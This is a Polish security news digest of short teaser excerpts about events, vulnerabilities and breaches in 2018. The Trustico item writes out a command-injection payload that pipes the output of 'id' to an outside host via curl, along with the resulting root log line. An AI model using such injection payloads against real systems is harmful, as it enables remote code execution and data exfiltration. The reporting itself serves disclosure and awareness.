O tym fakcie poinformowali sami twórcy Kali Linuksa. W cytowanym poście macie m.in. filmy pokazujące całą (dość prostą) procedurę instalacji. To już kolejny ukłon Microsoftu do kierunku świata Linuksa/Uniksa – ostatnio pisaliśmy o możliwości instalacji na Windows klienta OpenSSH. –ms

Chodzi o Trustico, który dostarczał certyfikaty SSL m.in. „pechowemu” Equifax. Jak wyglądał exploit dający roota? Banalnie – w miejscu gdzie sprawdzaliśmy domenę wystarczyło wpisać: $(curl https://domain/`id`) Efekt? Porażający, bo poza wykonaniem kodu, widać że wykonuje się on jako root: 35.190.140.214 – [01/Mar/2018:09:52:14 -0500] „GET /uid=0(root) HTTP/1.1” 404 209 „-” „curl/7.29.0”…

Nie czekamy już dłużej i udostępniliśmy dla wszystkich rozwal.to premium. Na początek można się „pobawić” przez dwa dni zupełnie bezpłatnie (pierwszych 100 osób; kod rabatowy: rozwal-premiera-start kilka pierwszych osób dostanie dużą ilość dni na start). Mimo załatania około 150 błędów, pewnie jeszcze parę można wykryć – szczególnie, że na start…

Jesteśmy już po drugiej edycji Hacking Party w Poznaniu. Tutaj mieliśmy kilka – jak zwykle praktycznych – prezentacji. Sala, którą zapewnił nam Uniwersytet im. Adama Mickiewicza – była mocno zapełniona – przybyło około 300 osób! Tym razem – zgodnie z sugestiami zaczekaliśmy jedynie 5 minut na spóźnialskich, a po prezentacjach…

… a to wszystko już 28.02 w Poznaniu. Startujemy o 14:30 (można być o 14:00) – Wydział Prawa i Administracji UAM Poznań Al. Niepodległości 53, Poznań Auditorium Maximum. Pełna agenda i zapisy dostępne są tutaj. To nasze kolejne sekurak hacking party, które tym razem wspiera Uniwersytet im. Adama Mickiewicza w Poznaniu…

Publikuję tego posta, bo platforma rozwal.to premium już działa poprawnie – tj. m.in. akceptuje płatności (karta/przelew/szybkie transfery typu mTransfer – obsługuje nas PayU). Zadowoleni powinni być też użytkownicy firmowi – system wystawia faktury VAT (i dla firm i dla osób prywatnych). Można już rejestrować konta, choć zaczniemy je stopniowo akceptować…

Tym razem spróbowaliśmy formuły ze startem we wcześniejszej godzinie (15:00) – i dla dużej liczby osób była to godzina optymalna. Pojawiło się ~450 osób, co przy założeniu że nie było darmowych wejść – jest całkiem niezłym wynikiem. Postawiliśmy też na więcej prezentacji, ale krótszych (opis wszystkich siedmiu macie tutaj). Sami…

12 lutego 2018 została udostępniona przez Ministerstwo Cyfryzacji długo oczekiwana aktualizacja Projektu Ustawy o Ochronie Danych Osobowych (datowana daniem 8 lutego 2018). Celem nadrzędnym zmian w Polskim porządku prawnym dotyczącym ochrony danych osobowych jest wprowadzenie Rozporządzenia o Ochronie Danych Osobowych (RODO) bazującego na Rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679….

W skrócie – jedna z japońskich giełd kryptowalutowych posiadała błąd, umożliwiający kupienie bitcoinów za darmo. Mimo że problem istniał tylko 18 minut, ktoś spróbował go wykorzystać. Swoją drogą prawdopodobnie podatność usunięto właśnie dzięki osobie, która chciała wykorzystać owego „exploita życia”, czyli sprzedać za darmo nabyte bitcoiny…: As at least one…

Różnorodne cele do hackowania, mini sekurak hacking party, dzielenie się wiedzą i super zarobki. Potrzeba czegoś więcej? :-)

Troy Hunt udostępnia do pobrania bazę przeszło 500 milionów unikalnych haseł, zebranych aż z przeszło 3 miliardów rekordów(!). Troy udostępnia zbiór głównie w celu jego zintegrowania go z funkcją ustawiania haseł w systemach / aplikacjach. Teraz łatwo będzie nie pozwolić użytkownikowi ustalić hasło, które kiedyś publicznie wyciekło. A żeby atakującym…

Być może część z Was została dzisiaj mocno zaniepokojona takim komunikatem: Wygląda to dość mocno Jedna ze standardowych bibliotek systemowych zakażona koparką kryptowalut?! Avast na szczęście potwierdził że jest to false positive i łata problem. Oczywiście „blokada” normalnej biblioteki systemowej to nie jest najlepsza rzecz która nas może spotkać, ale pytanie…

Podatności nie są jeszcze do końca załatane. Problemy sprowadzają się do dostępnych na localhost usług, startowanych przez uTorrent, które de facto dostępne są bez uwierzytelnienia. Tzn. pardon, niby są: http://127.0.0.1:19575/gui/index.html?localauth=localapic3cfe21229a80938: Widzicie ten localauth? … ale można go odzyskać (przez DNS rebinding, podobna historia była niedawno w grach Blizzarda) korzystając z nieuwierzytelnionego…

O fakcie donosi firma RedLock  – w tym przypadku udało się najpierw dostać do należącego do Tesli serwera Kubernetes (dostęp był bez hasła): Tam jak widzicie były dostępne klucze do instancji Amazon S3. Załoga z RedLock twierdzi, że były tam składowane dane telemetryczne (dotyczące samochodów). Sami przedstawiciele Tesli napisali z kolei, że S3…

Elementy hackowania GSM, podsłuch VoIP na żywo, proste generowanie dowolnej komunikacji sieciowej, łamiące programistów Javy demo złowrogiego wykorzystania The Spring Expression Language czy hackowanie kamer –  to tylko kilka wybranych tematów, które będziemy poruszać na naszych hacking party w Krakowie oraz w Poznaniu (zobacz szczegóły agend poniżej). Agendę + zapisy na Kraków zobacz tutaj (26.02.2018) –…